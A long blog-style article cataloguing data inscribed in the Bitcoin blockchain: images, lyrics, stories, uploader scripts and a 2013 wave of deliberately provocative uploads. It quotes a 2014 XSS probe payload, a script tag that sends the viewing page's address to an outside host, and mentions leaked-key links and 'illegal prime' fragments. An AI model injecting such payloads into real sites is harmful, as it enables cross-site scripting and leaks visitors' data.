This is a collection of cool data found in the Bitcoin blockchain using techniques mentioned at: Section "How to extract data from the Bitcoin blockchain". Notably, Ciro Santilli developed his own set of scripts at github.com/cirosantilli/bitcoin-inscription-indexer to find some of this data. This article is based on data analyzed up to around block 831k (February 2024).
Drop some Bitcoins at 3KRk7f2JgekF6x7QBqPHdZ3pPDuMdY3eWR if you are loaded and like this article in order to support some much needed higher educational reform: Section "Sponsor Ciro Santilli's work on OurBigBook.com".
When this kind of non-financial data is embedded into a blockchain some people called an "inscription". The study or "early" inscriptions had been called a form of "archaeology"[ref][ref]. Since this is a collection of archeological artifacts, we call it a "museum"!
My Bitcoin inscription museum by Ciro Santilli
. Source. Introductory video to this article. Edited from Aratu Week 2024 Talk by Ciro Santilli: My Best Random Projects.One really cool thing about inscriptions is that because blockchains are huge Merkle trees, it is impossible to censor any one inscription without censoring the entire blockchain. It is also really cool to see people treating the Bitcoin blockchain basically like a global social media feed!
Starting on December 2022, ordinal ruleset inscriptions took the bitcoin blockchain by storm, and dwarfed in volume all other previous inscriptions. This museum focuses mostly on non-ordinals, though certain specific ordinal topics that especially interest he curators may be covered, e.g. Ordinal ruleset inscription porn and ordinal ASCII art inscription.
Hidden surprises in the Bitcoin blockchain by Ken Shirriff (2014) is a mandatory precursor to this article and contains the most interesting examples of the time. But much happened since Ken's article which we try to cover. This analysis is also a bit more data oriented through our usage of scripting.
Artifacts can be organized in various ways:In this article we've done a mixture of:Who said it was easy to be a museum curator!
- chronologically
- by media type, e.g. images vs text
- by themes or events, e.g. the Prayer wars or Mt. Gox' shutdown
- encoding, e.g. AtomSea & EMBII vs raw images
- themes: if multiple items fall in a theme, we tend to put it there first
- then by media type if they don't fit any specific theme
- then by encoding
- and finally chronologically within each section
An upload system for various media types includeing text, images, HTML pages and audio.
bitfossil.org is an indexer website created by EMBII for it.
Each AtomSea payload has a toplevel transaction which links to other transactions. All the linked transactions together make up the payload. The most common payload type is a text plus image, as is the case of Nelson-Mandela.jpg, which can be seen at bitfossil.com/78f0e6de0ce007f4dd4a09085e649d7e354f70bc7da06d697b167f353f115b8e/ where
78f0e6de0ce007f4dd4a09085e649d7e354f70bc7da06d697b167f353f115b8e
is the toplevel transaction ID: www.blockchain.com/btc/tx/78f0e6de0ce007f4dd4a09085e649d7e354f70bc7da06d697b167f353f115b8eSee Section "Nelson-Mandela.jpg" for a detailed reverse engineering of the format, and Section "AtomSea & EMBII data format" for a summary of it.
Holy crap, they actually support:
- multipage setups:
The Mahabharata
bitfossil.com/0618f12af65a4e82f8e7b41f8578721dfeb109e9a73ff71aebdbc982696e3720/Figure 1. Illustration for The Mahabharata inscription. - image galleries: bitfossil.org/ae8d3b46b934bedc363e11abe8c8607171994470957c286274f699a0b3a9bbd7/index.htm
- audio:
Spock_Live_Long_And_Prosper.mp3
bitfossil.org/1bc87dbff1ff5831287f62ac7cf95579794e4386688479bab66174963f9a4a0c/index.htm - author photo below post via signture!!! bitfossil.org/738ab32bf82e3e0d4d2b29e40ad194cbbef6685d0116e94371e3cef4992349c8/index.htm (testnet) See the
SIGNED BY
with EMBII's photo!
apertus.io/ is the system to upload/index locally, and therefore likely part of the backend of bitfossil: github.com/HugPuddle/Apertus
The system shows the messages and the images on a single page: bitfossil.org/4cbb32cd27b5b5edc12d3559bdffc1355ac2a210463d5cfaadc7ce9b06675b2b/index.htm It is basically a blockchain-based Twitter.
Hidden surprises in the Bitcoin blockchain by Ken Shirriff (2014) suggests that AtomSea & EMBII are the creator's aliases. The following online profiles of the creators feel authentic:Tried saying hi to them at: twitter.com/cirosantilli/status/1382080760774033415 and they replied: twitter.com/AllenVandever/status/1563964396656812034
- AtomSea:
- EMBII
- HugPuddle
Somewhat related projects:
At twitter.com/EMBII4U/status/1762501350997233976 (2024) EMBII mentions that he was inspired by the Satoshi uploader.
bitcoin.jpg
A bitcoin logo on block 123573 (2011-05-13).
This is the very first ASCII string to show up at github.com/cirosantilli/bitcoin-inscription-indexer after only the Genesis block message.
This version of the image was just ripped from Hidden surprises in the Bitcoin blockchain by Ken Shirriff (2014).
Reconstructing it should likely be a simple matter of copy pasting the ASCII yEnc encoding present in the two transactions from tx ceb1a7fb57ef8b75ac59b56dd859d5cb3ab5c31168aa55eb3819cd5ddbd3d806 into a text file and decoding the yEnc, but after searching for 20 minutes Ciro couldn't find a working yEnc decoder on Ubuntu 21.10. How can a format be so dead, even after considerable extensive use in the Usenet??? It makes you think about life.
As mentioned by Ken, the logo is split across two transactions: ceb1a7fb57ef8b75ac59b56dd859d5cb3ab5c31168aa55eb3819cd5ddbd3d806 and 9173744691ac25f3cd94f35d4fc0e0a2b9d1ab17b4fe562acc07660552f95518.
There appears to be nothing strictly linking the two transactions, besides that they are very close by and the only ASCII strings around back in those pre-infinite-spam days, as can be seen at: github.com/cirosantilli/bitcoin-inscription-indexer/blob/master/data/out/0123.txt#L11, so you could just see both of them by eye.
Also the first one starts with:and the second one ends in:so this is likely clearly part of the yEnc format for someone who knows it, and the filename
=ybegin line=128 size=8776 name=bitcoin.jpg
=yend size=8776 crc32=a7ac8449
bitcoin.jpg
gives the file format.They are not even in the same block:both from 2011-05-13. Also note that they ended up being committed reverse order, since you don't have a strict order control over the final blockchain.
v27sSra.jpg
. An image of a dozen people siting at a dinner table, with each person identified by a Twitter handle that was edited in.
This image is present tx 4be3a833ee83b4ca7d157d60fbf7411f7528314ce90df8a844f855118bc6ca11 from block 357239 (2015-05-20), an input transaction.
It contains a base 64 encoded image:
v27sSra.jpg
/9j/4AAQSkZJRgABAQEASABIAAD/2wBDACgcHiMeGSgjISMtKygwPGRBPDc3PHtYXUlkkYCZlo+A
...
TAkBaMxbbhuYXGDMyXw/MIV84IqrE//Z
...
By manually copy pasting that into a file The exact same content appears to be present on the next input transaction 56d23a230042c094bc54bb72fc4c10a3f26750030b9927994e741d3689f5c09e on the same block.
v27sSra.base64
we can obtain the image with:base64 -d <v27sSra.base64 >v27sSra.jpg
Google reverse image search leads to freedom-to-tinker.com/2015/05/21/the-story-behind-the-picture-of-nick-szabo-with-other-bitcoin-researchers-and-developers/ The story behind the picture of Nick Szabo with other Bitcoin researchers and developers by Arvind Narayanan (2015), in which Arvind (@random_walker) who attended the meeting clearly lists all names and handles, and talks about the background of gathering of Bitcoin devs that happened in March 2014. The article also contains a higher resolution version of the image uploaded to the blockchain.
It also links to a popular Reddit thread that contains the image from May 2015: www.reddit.com/r/Bitcoin/comments/36hfu4/pic_coredevs_having_dinner_with_nick_szabo/
Googling
v27sSra.jpg
leads to bitcointalk.org/index.php?topic=1061926.220;wap "New York Times identifies Nick Szabo as Satoshi Nakamoto" which links to i.imgur.com/v27sSra.jpg so this is a Satoshi Nakamoto-real-identity thing.These can be viewed at bitcoinstrings.com/blk00052.txt and are mostly commented on the "Wikileaks cablegate data" section of Hidden surprises in the Bitcoin blockchain by Ken Shirriff (2014).
Soon after block 229991 uploaded the Satoshi uploader, several interesting files were added to the blockchain using the uploader, and notably some containing content that might be illegal in certain countries, as a test to see if this type of content would make the Bitcoin blockchain illegal or not:
- tx 08654f9dc9d673b3527b48ad06ab1b199ad47b61fd54033af30c2ee975c588bd block 229999 contains a leaked private key and a link to: threatpost.com/en_us/blogs/ami-firmware-source-codAe-private-key-leaked-040513
- tx b96af3b69b48a82c5eae3e44ebb6ef93f30d7764b1d5b40243e11b0d374ac1b7 block 230001 contains the link:followed presumably by one such prime starting with:The number is quoted e.g. at: www.computerforum.com/threads/illegal-prime-number.67782/
4 85650 78965 73978 29309 84189 46942 86137 70744 20873 51357 92401 96520 73668
- tx 237783998a6799264983150187a73ab6d116f2ba78d3e1f88529e95229f59d67 block 233620 contains another illegal prime starting with:
This one is quoted in a few places online in blockchain illegality discussions:49310 83597 02850 19002 75777 67239 07649 57284
- www.reddit.com/r/Bitcoin/comments/1akyy4/comment/c8yel60 "What happens if someone inserts illegal content into the block chain?" (2013-03-19)
- news.ycombinator.com/item?id=8055243 "Filecoin – Data storage network and crypto-currency based on Bitcoin" (2014-07-18)
- tx 54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713 block 230009 contains the Bitcoin white paper: bitcoin.org/bitcoin.pdf More context: bitcoin.stackexchange.com/questions/35959/how-is-the-whitepaper-decoded-from-the-blockchain-tx-with-1000x-m-of-n-multisi
- tx 691dd277dc0e90a462a3d652a1171686de49cf19067cd33c7df0392833fb986a block 230203 Cablegate index. The announced filename is
cablegate-201012041811.7z
. As mentioned in Hidden surprises in the Bitcoin blockchain by Ken Shirriff (2014), it has an ASCII list of several other transactions, which presumably when downloaded with the Satoshi uploader can concatenated lead to the full 7z file. Also as mentioned by Ken, it is infinitely easier for the average user to just access the cables directly on WikiLeaks :-) The data is preceded by the message:sSEXWikileaks Cablegate Backup cablegate-201012041811.7z Download the following transactions with Satoshi Nakamoto's download tool which can be found in transaction 6c53cd987119ef797d5adccd76241247988a0a5ef783572a9972e7371c5fb0cc Free speech and free enterprise! Thank you Satoshi!
- tx dde7cd8e8f073a525c16c5ee4e4a254f847b7ad6babef257231813166fbef551 block 230229 and tx 4a0088a249e9099d205fb4760c28275d4b8965ac9fd56f5ddf6771cdb0d94f38 block 230231 contain indexes of pages from The Hidden Wiki. These can be viewed at: bitcoinstrings.com/blk00052.txt. Not reproduced here because we are cowards.
So basically, this was the first obviously illegal block attempt.
None of this content is particularly eye-popping for Ciro Santilli's slightly crazy freedom of speech standards, and as of 2021, the Bitcoin blockchain likely hasn't become illegal anywhere yet due to freedom of speech concerns.
Furthermore, it is likely much easier to find much worse illegal content by browsing any uncensored Onion service search engine for 2 minutes.
Ciro Santilli estimates that perhaps the uploader didn't upload child pornography, which is basically the apex of illegality of this era, because they were afraid that their identities would one day be found.
Bibliography:
- bitcointalk.org/index.php?topic=191039.0 "WTF - Kiddy Porn in the Blockchain for life?" (2013-04-29) on the Bitcoin Forum
Rickrolling lyrics were mined several times into the blockchain.
The first currently known instance is as a link right during the prayer wars on block 142573 (2011-08-25) as the miner message:which redirects to www.youtube.com/watch?v=mGDuExhS6Nw&blockchain
Militant atheists, bit.ly/naNhG2 -- happy now?"
Around block block 246k (e.g. 27b7c526489dac8245747fa1c425a2e3eb07dea57b294eb4ae583fec9b859fcf, 2013-10-17) we note several transactions starting with a XML format followed by lyrics also base64 encoded as part of the XML metadata. Hidden surprises in the Bitcoin blockchain by Ken Shirriff (2014) was not able to identify the exact format either. At twitter.com/EMBII4U/status/1655831533750562816 EMBII mentions that this was part of an upload test.
<CG SZ="1156"><MG>...
the first one being 0b4efe49ea1454020c4d51a163a93f726a20cd75ad50bb9ed0f4623c141a8008 As mentioned not very clearly at www.righto.com/2014/02/ascii-bernanke-wikileaks-photographs.html#ref12 the content of the first <MG><payload></MG>
is a Base64 encoded stringCatagory: Poetry
Title: Never Gonna Give You Up
Performer: Rick Astley
Writer: Mike Stock, Matt Aitken, Pete Waterman
Label: RCA Records
tx d29c9c0e8e4d2a9790922af73f0b8d51f0bd4bb19940d9cf910ead8fbe85bc9b (2013-11-13) contains a plaintext Rickroll lyric in an output script via OP_RETURN.
tx 15b11e8d4e5b9425f024b381ba0cb7a54a35e52389bb4855f505772ce685b39c (2014-06-24): starting from this transaction, the lyrics were inscribed several times via input scripts. Then again:They were mega obnoxious!!! Who does this kind of crap for more than one year!!!
- 8bb9db70e24202fdfd0e48b57a11a407e6c8c0e76d879634b801b4345b8810b2
- b881afa519804a3c93a3c99481517ca8ae070b84c04e8e7a2bfb808e043f9771
- 70c8405bd0ec10bea49b78a819dfbf46c1082e7e620588f9da65a90b71e52bbd
- fc4e382793757858bec4b87527caa4bf2e6f71bb2f5a77bb41a45ddb9ed9d409
- f011e71b711aa54a0c824244fff83fb8b1e1921804624fa0523a6e61612b7f6f
- a8691cdbca5b82e4e48812e48b7a09e4757801fd3909a09975de957d1bfb52dc
- d8946aa464be464674bba6d15729d75572ec75dda49fe7ff0ede1a25ca054941
- d02864cd57c9d041dbd9d6f24327f347b92697a8bc3c86cdf8b738063c6ad002
- 9b78962d840f1ff681e5042264e4d0359cda98ce49d97569df14ce956622b966
- 7bdc22fb35f0a8eb6241782a306a8904fb6f793126ff106a04a96f9f223cb8e1
- e24a4085c54a6362e615f8eab758c12d80e488b73757e6d2b8ab6bfc8be7007e
- 4257f4980955d8376ee1c6bccb4396da726e4ae13d758e47dc4e0775019723f5
- a09b49e9374d43386a6a986944e3dcf515c7e1c38324836df5333b8adbe57797
- 03096688dbb874f7c571691e4241a298284bf4184be339b148f1b48f383a1d7c
- 62f8b228b6126354736d36d9f3b91882bb81eca7702b74fba6471abc7db96a03 (2015-09-30)
Here are some exceptionally interesting text inscriptions that are not mentioned in other sections:
- Section "Genesis block message"
- tx 3a1c1cc760bffad4041cbfde56fbb5e29ea58fda416e9f4c4615becd65576fe7 (2013-04-10) has the broken Basic creature simulation mentioned at Hidden surprises in the Bitcoin blockchain by Ken Shirriff (2014) section "A creature simulator in Basic" starting with:
10 REM The variables in life 20 ' life the lifespan of a creature 30 ' mates the number of mates a creature needs to breed
- tx 61e26d407c17e8ee33a8b166c78f78c53cdcdc0078ae1f9405e6583cfb90eaf4, block 268081 (2013-11-05). This is a very interesting transaction, it contains inscriptions both on the input script and on the output script. On the input:On the output:
I should not run the washing machine while listening to WZBC. I managed to convince myself that the machine was slowly failing -- that a rythmic, squeaking noise it had been making had gotten a little worse. Ten minutes later, though, the machine had paused. But the noise was still there.
Feels like a Koan. I wish I knew who inscribed this.> Skynet went online on August 4th 1997, and began to learn at a geometric rate. > It became self-aware on August 29th 1997 2:14 am Eastern Time. On August 29th > 1997 2:15 am it discovered nihilism, and either shut itself down due to > despair, or because it was logical. We're not sure which. On August 4th, 1998, it failed to renew its domain name, which was promptly squatted on by a link farmer pitching X10 cameras and singing electric fish.
- tx 4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af, block 305806 (2014-06-14) contains a blockchain explorer XSS detector that reports its location back to: www.trollbot.org/xss-blockchain-detector.phpSoon afterwards at tx a165c82cf21a6bae54dde98b7e00ab43b695debb59dfe7d279ac0c59d6043e24 block 305809 there is a different version with slightly different escaping:
<script type='text/javascript'>document.write('<img src='http://www.trollbot.org/xss-blockchain-detector.php?href=' + location.href + ''>');</script>
Also of interest, the output script of 4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af is non standard and a provably unspendable Bitcoin output script. a165c82cf21a6bae54dde98b7e00ab43b695debb59dfe7d279ac0c59d6043e24 however, although also non-standard, was spendable and was spent, further analysis at: Section "4373b97e4525be4c2f4b491be9f14ac2b106ba521587dad8f134040d16ff73af".<script type='text/javascript'>document.write('<img src=\'http://www.trollbot.org/xss-blockchain-detector.php?bc=btc&href=' + location.href + '\'>');</script>
- tx 713a6832365a68f71c6aee879f79b70e6e738cd6255f09bc41f204c81575c248 (2014-09-28) via cryptograffiti.info has the eleven rules of LaVevan Stanism starting with:
1. Do not give opinions or advice unless you are asked.
- tx 604f17dfdb5a88fc072bd2bcf53436087c899051241e519af7241dc0037d3df6 (2014-12-01) has a cover letter for a job at Hive Blockchain Technologies Ltd:At news.ycombinator.com/item?id=26826334 the supposed author mentions they didn't reply... sad. He did get to work for another Blockchain company though: www.ascribe.io, which eventually died. Presumably github.com/TimDaub.
Dear hive team, ever since I have discovered Bitcoin I have been a fan of your products. [...]. Sincerely, Tim Daubenschuetz
- tx 213e8f46f98e96f4f4d8b45bd3a1cbada14213796c200220e1e8c2b315988faa (2015-03-25)contains a full-text copy of: cointelegraph.com/news/113806/warning-kaspersky-alerts-users-of-malware-and-blockchain-abuse (2015-03-27), includinga link to it. Two other copies appear in future transactions tx c863aa9d6aa9345e4abdc216b6f035c4276b4423a924bb2e1593c22c670cba6f and tx ba58caf1a27ab7ca627cc3efa5914e4d37e00b3a7e9cf29508d451dc3da00bf7
Warning! Kaspersky Alerts Users of Malware and 'Blockchain Abuse'
- tx 3405f441f0d3acd8580d261d58e5a14d7638d0ee29200e673f496198d231edd7, block 364852 (2015-07-11) and a nearby transaction on the same block 1759ed3f0f5829711157c1fc3662f4bf01f3bee3a430242bc729898bb77c2a4a via cryptograffiti.info contains a possibly novel long short story entitled:The first paragraph is:
How to Play Chinese Hats - A Short Story - 2015
At the end we see a signature and a tipjar:Somehow, you find yourself in a dim and smoky room with no entrance, exit or windows, without knowing how you got there or even where you've come from. In front of you are a group of Chinese gentlemen shuffling around what looks to be traditional black Chinese hats styled after the Ming dynasty, on a circular chestnut wood table. Surprisingly, you find the same type of hat in your very own hand when you look down.
He did receive one tipin 2015 for 0.02590000 BTC: www.blockchain.com/explorer/addresses/BTC/1LQGWkhE7GULhj2gjjRwB9uZR7SMfGvjGVRen @ 1LQGWkhE7GULhj2gjjRwB9uZR7SMfGvjGV
1759ed3f0f5829711157c1fc3662f4bf01f3bee3a430242bc729898bb77c2a4a
- tx 0b63ebfadcb7bb66bc2a4bc7b826587505eab0450ca64c376ac9912a00d35c54, block 371796 (2015-08-27) via cryptograffiti.info has a large text entitled with what seems to be a storm forecast:A Wikipedia page about the August 2015 event: en.wikipedia.org/wiki/Tropical_Storm_Erika
TROPICAL STORM ERIKA INTERMEDIATE ADVISORY NUMBER 11A
The storm was formed "August 24, 2015", so this inscription was contemporary. Good friend, warning his fellow Bitcoiners.Tropical Storm Erika was one of the deadliest and most destructive natural disasters in Dominica since Hurricane David in 1979.
- tx 4dd57f3e443ad1567a37beab8f6b31d8cb1328a26bac09e50ba96048ad07b8c1 (2015-09-03) via cryptograffiti.info contains a long porn comededy text in an Italian-like languge starting with:which translates to:
E il cazzo non entr
.And the dick doesn't fit
By dumping the transaction data, we actually see that the beginning was slightly missed due to a character encoding issue, the text actually starts with:followed by some non ASCII characters that we haven't yet been able to decode. It is not ISO_8859-1.BANG!
Ciro Santilli first thought it might beto be a dialect of Italian, or possibly Sicilian language given the presence of "sv" in the text, but an Italian friend says it is just Italian with several words cut in half, possibly for comedic effect. No pre-existing hits found on the web. - tx 24e137d5b478d9a8b947e4f3f6130a86f2e0f6a2dda1cac1373b485c577f8ba7 (2015-12-03) contains a tale of an Electrical Engineer vs a Software developer tale.Possible original: www.cs.brandeis.edu/~hornby/amuse/vs_toast.txt
Once upon a time, in a kingdom not far from here
- tx e2c20c2977589240ad9486672a0273d340ed5f8b50a50071716d12035d7212e8 (2016-01-31) has a large Lorem ipsum
- tx 5f62490ca4736da30da35ebc3f86156dbdb529dcb2f77cb8b0eb84868d567b00 (2016-05-05) via cryptograffiti.info contains a poem entitled:whichi is Dutch for;
Voor mijn jongere broeder
No Google hits, so possibly novel.For my younger brother
- tx 0809e7f31d074eefc0f1f02463a28b5238688aa73e6361c01cbc7b1848ac8d93 (2017-07-10) via cryptograffiti.info contains a white paper entitled:by Erich Ertsu from Coingaming Group (July, 2017). He was previously the creator of cryptograffiti.info This is the startup: www.crunchbase.com/organization/coingaming, previously at coingaming.io but now moved toyolo.com. The paper does not seem to be reproduced anywhere on the clearweb, the blockchain was its primary location of publication.
Disincentivizing Double-Spending by Making it Unprofitable
- tx e450166eba552202fb6984867f2b851e2399c5a0ae05026bf6b056176491ec5d (2017-03-11)
Here are some of the reasons why Tau is better than Pi as a universal constant for circles.
- tx 0f25e23b7b59fde67d8b2d41b749e4f89fd1ff8061aa0ddac8c27c8230167e35 (2017-08-18):Epic. The transaction sent:
A Crosschain transaction was sent in to your address in error. The transaction was 9174f24946496823e4edaf3fe1676a404164178d1c848fa476113bbe2f5b9463 . Please return to 1AAEXtLo9SoyFQbZvWoqAMCpkz9okSpCuV. Thank you in advance."
1AAEXtLo9SoyFQbZvWoqAMCpkz9okSpCuV never received anything back so far.- 0.23225200 to 1BqyRKHoLEKgHGUoDiFUEZu5jPaWeuCWWt
- 5.6 BTC to 1JG8EVTx1zWzDyctAD5fFuMt59TWkSw2dW
The message is encoded as fake 12 P2PKH outputs, followed by an actual address, presumably the message target, but none of the addresses is one of the above targets of the transaction, so how did they know to associate the addreses? They must have extra hidden data? - tx 057954bb28527ff9c7701c6fd2b7f770163718ded09745da56cc95e7606afe99, block 666666 (2021-01-18):As highlighted at www.reddit.com/r/Bitcoin/comments/vxletr/message_was_embedded_in_block_666666/ the block number is a reference to the number of the beast.
Do not be overcome by evil, but overcome evil with good - Romans 12:21
TODO:
- 55a5d0c09ad5535711d649fdab394add3bb6e50cc2c49920cf0cb758ff0b69e8 via cryptograffiti.info contains what seems to be a ASCII table tracking train movements? Maybe from a train lover? But also curiously, it is GPG signed:Interesting.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 time direction # covered #uncovered notes 11/11/2013 6:31pm E 4 1 csx 6243 11/19/2013 4:46pm E 3 0 csx 6215 11/19/2013 5:44pm W 4 0 Amtrak 11/21/2013 4:05pm E 0 0 csx 6206
86c1b7bd8bbdd8903355a8f6a408616621fd2ea4321b9aced778f388afe0b244 has something similar. - cc38d740dc1999a803dbba0c48a82af994861e0767f6bcd7d6ceebe4e66b4678 via cryptograffiti.info contains a pipe dream technical proposal idea entitled:
Attack-resistant decentralized time and location services via Nakamoto chain consensus.
- 5d9ef37e6beea5342ce1cb2681a7b465a542394aeda2b1e1fed00fab44b17833 via cryptograffiti.info contains a test of every character from 0 to 255, e.g. some of the readable characters are:d5f6614b4e3bdc611c8ad15f158163e48e1a1298ea5f5f9832ada8db6e2dd4b2 has something similar.
65: A 66: B 67: C 68: D 69: E 70: F 71: G 72: H 73: I 74: J 75: K 76: L 77: M
- 0f96b2f6e3c4f4b6319efbafd2e7148d507b260b4d7914766e79aec7d9ac9574 via cryptograffiti.info has a long-ish message that looks like a software release note, not sure what it is about:
Truecrypt 7.1a ============== 2015-07-19 I am setting the filesizes and checksums of the last Truecrypt version (7.1a) in stone.
- 206a0edb11ba0677248709d9bc5210b35e8a03710d9bb19c6f1e4e254bf21f5e via cryptograffiti.info has a letter to AGI:While cute, the author clearly underestimates the magnitude of singularity!
Dear Artificial Intelligence,
- cdbeb50c11b788fa4e67e00fb2e2607b129492a4a38bed0a9e31443a42e272a4 via cryptograffiti.info contains a semi-philosophical text that starts with:
When in the course of cosmic evolution,
- b55c3312ceeeb4ab422b658f5f4d5884775a498ddde6a527fca7b67752e1b044 via cryptograffiti.info contains some wedding vows starting with and GPG-signed:Zachary Thomas Smith,I give myself - Jenna Marie Vaziri - to you, to be your wife, your best friend, and your home - just as you are to me.
- 3620da027df2e2e34ac9abe0123dcd7217fc5b8dec9921cbae258c640c7a6591 via cryptograffiti.info contains a neatly formatted UTF-8 ad with a link to: bitcointalk.org/index.php?topic=1033773.0The thread links to bcexchange.org/ which is dead as of 2024.
╭───────────────────────────────────────────────────────────────────────────╮ │ B&C EXCHANGE: A decentralized cryptocurrency exchange for everyone │ ┝━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┥ │ https://bitcointalk.org/index.php?topic=1033773.0 │ │ │ │ B&C Exchange will be an open-source decentralized exchange that completes │ │ cryptocurrency trades between users by utilizing multisig signers that │ │ compete for blockchain rewards based on their effectiveness and honesty. │ ├╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┤ ┆ ▷▶▷▶ There are 10 days left in the auction! ◀◁◀◁ ┆ ╰───────────────────────────────────────────────────────────────────────────
f93e128c59b357ca2d1b256eb1c4d991c488da460527ca0898dc789210073bd2 has another one:┏━━ UTF-8 is coming to CryptoGraffiti.info!!! ━━┓ ┠╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌╌┨ ┃ I love you. Σ΄αγαπώ. ┃ ┃ Ma armastan sind. ┃ ┃ Aš tave myliu. Mä rakastan sua. ┃ ┃ Я люблю тебя. ┃ ┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
- 140562ceb42fc8943fa52ccc0ddbb11ca2d88dae9b5240d7a4b46864538c515aTODO understand this part:
Reddit on the Bitcoin blockchain Test
The "Address" you see above is more than a bitcoin address? For example, the web address to this reddit thread is: https://www.reddit.com/r/Bitcoin/comments/3cdxep/reddit_on_the_blockchain_test/ Which converts to the bitcoin address of: 12uPLj6PSz6ULnZi1jXo7Ch1Je1SuqxRcE How? Because any text, like a web address, can be converted into a bitcoin address. www.reddit.com = 1MZCEUCtyJCDkNSLYbPVvAgf9V3CsEw3t www.google.com = 1JEZLaFciACHDEMVd3RXZzPmGcsWEwYQLr www.voat.com = 1JvCp9X5Bvvt2kz3EqP5ppkzX62sKgKbqr www.paystamper.com = 14wgeaWz2rKax8iVSWNFSrSsAYNeGyNdkt Duriel@paystamper.com = 1HcuhfTAiQCt6KdMG2rZLXsTcKYj9nLDhS
- 940f41f5cc96182c1392c239d7570f94bd524e141ca0a88fdb154bd817049f83.bin via cryptograffiti.info contains some links to profiles controlled by a "Daniel Michael Abraham" www.linkedin.com/in/daniel-abraham-9432a798/. Other messages by him:
- 3d39024fa0cddfc529d4a41501df7a076f5bcf9a7a43f88f54a717e6df7f4770
- 088ebf7ffdef96b8fcac7eafa2ff6d04f295ea24f159e1ce4b7d47ed7b91b1f9
By "Satoshi uploader" we mean the data upload script present in tx 4b72a223007eab8a951d43edc171befeabc7b5dca4213770c88e09ba5b936e17 of the Bitcoin blockchain.
The uploader, and its accompanying downloader, are Python programs stored in the blockchain itself. They are made to upload and download arbitrary data into the blockchain via RPC.
These scripts were notably used for: illegal content of block 229k. The script did not maintain its popularity much after this initial surge up loads, likely all done by the same user: there are very very few uploads done after block 229k with the Satoshi uploader.
Our choice of name as "Satoshi uploader" is copied from A Quantitative Analysis of the Impact of Arbitrary Blockchain Content on Bitcoin by Matzutt et al. (2018) because the scripts are Copyrighted Satoshi Nakamoto on the header comment, although as mentioned at Hidden surprises in the Bitcoin blockchain by Ken Shirriff (2014) this feels very unlikely to be true.
A more convenient version of those scripts that can download directly from blockchain.info without the need for a full local node can be found at: github.com/cirosantilli/bitcoin-inscription-indexer/blob/master/download_tx_consts.py by using the
--satoshi
option. E.g. with it you can download the uploader script with:./download_tx_consts.py --satoshi 4b72a223007eab8a951d43edc171befeabc7b5dca4213770c88e09ba5b936e17
mv 4b72a223007eab8a951d43edc171befeabc7b5dca4213770c88e09ba5b936e17.bin uploader.py
The scripts can be found in the blockchain at:
- uploader: tx 4b72a223007eab8a951d43edc171befeabc7b5dca4213770c88e09ba5b936e17 block 229991 reproduced at: gist.github.com/cirosantilli/ade4dde7c2f2f5020d792872681763e8The uploader creates a standard Pay-to-PubkeyHash transaction with a single output and data as a fake pubkey hash, and sends change to an address specified on the command line:
./bitcoinInsertionTool.py <data> <change-addr>
- downloader: tx 6c53cd987119ef797d5adccd76241247988a0a5ef783572a9972e7371c5fb0cc block 229991 reproduced at gist.github.com/cirosantilli/e90bd2e6c3fab25a20898e61e3ab3e90The downloader just strips all operands, and keeps all data, notably where public key hashes would be normally put.
The uploader script uses its own cumbersome data encoding format, which we call the "Satoshi uploader format". The is as follows:This means that if we want to index certain file types encoded in this format, a good heuristic is to skip the first 9 bytes (4 size, 4 CRC, 1
- ignore all script operands and constants less than 20 bytes (40 hex characters). And there are a lot of small operands, e.g. the uploader itself uses format www.blockchain.com/btc/tx/4b72a223007eab8a951d43edc171befeabc7b5dca4213770c88e09ba5b936e17 has a
OP_1
, data,OP_3
,OP_CHECKMULTISIG
pattern on every output script, so theOP_1
andOP_3
are ignored. I.e., it is P2FMS. - ignore the last output, which contains a real change transaction instead of arbitrary data. TODO why not just do what with the length instead?
- the first 4 bytes are the payload length, the next 4 bytes a CRC-32 signature. The payload length is in particular useful because of possible granularity of transactions. But it is hard to understand why a CRC-32 is needed in the middle of the largest hash tree ever created by human kind!!! It does however have the adavantage that it allows us to more uniquely identify which transactions use the format or not.
OP_1
) and look for file signatures.Let's try out the downloader to download itself. First you have to be running a Bitcoin Core server locally. Then, supposing we run:worked! The source of the downloader script is visible! Note that we had to wait for the sync of the entire blockchain to be fully finished for some reason for that to work.
.bitcon/bitoin.conf
containing:rpcuser=asdf
rpcpassword=qwer
server=1
txindex=1
git clone git://github.com/jgarzik/python-bitcoinrpc.git
git -C python-bitcoinrpc checkout cdf43b41f982b4f811cd4ebfbc787ab2abf5c94a
wget https://gist.githubusercontent.com/shirriff/64f48fa09a61b56ffcf9/raw/ad1d2e041edc0fb7ef23402e64eeb92c045b5ef7/bitcoin-file-downloader.py
pip install python-bitcoinrpc==1.0
BTCRPCURL=http://asdf:qwer@127.0.0.1:8332 \
PYTHONPATH="$(pwd)/python-bitcoinrpc:$PYTHONPATH" \
python3 bitcoin-file-downloader.py \
6c53cd987119ef797d5adccd76241247988a0a5ef783572a9972e7371c5fb0cc
Other known uploads in Satoshi format except from the first few:
- tx 89248ecadd51ada613cf8bdf46c174c57842e51de4f99f4bbd8b8b34d3cb7792 block 344068 see ASCII art
- tx 1ff17021495e4afb27f2f55cc1ef487c48e33bd5a472a4a68c56a84fc38871ec contains the ASCII text
e5a6f30ff7d43f96f61af05efaf96f869aa072b5a071f32a24b03702d1dcd2a6
. This number however is not a known transaction ID in the blockchain, and has no Google hits.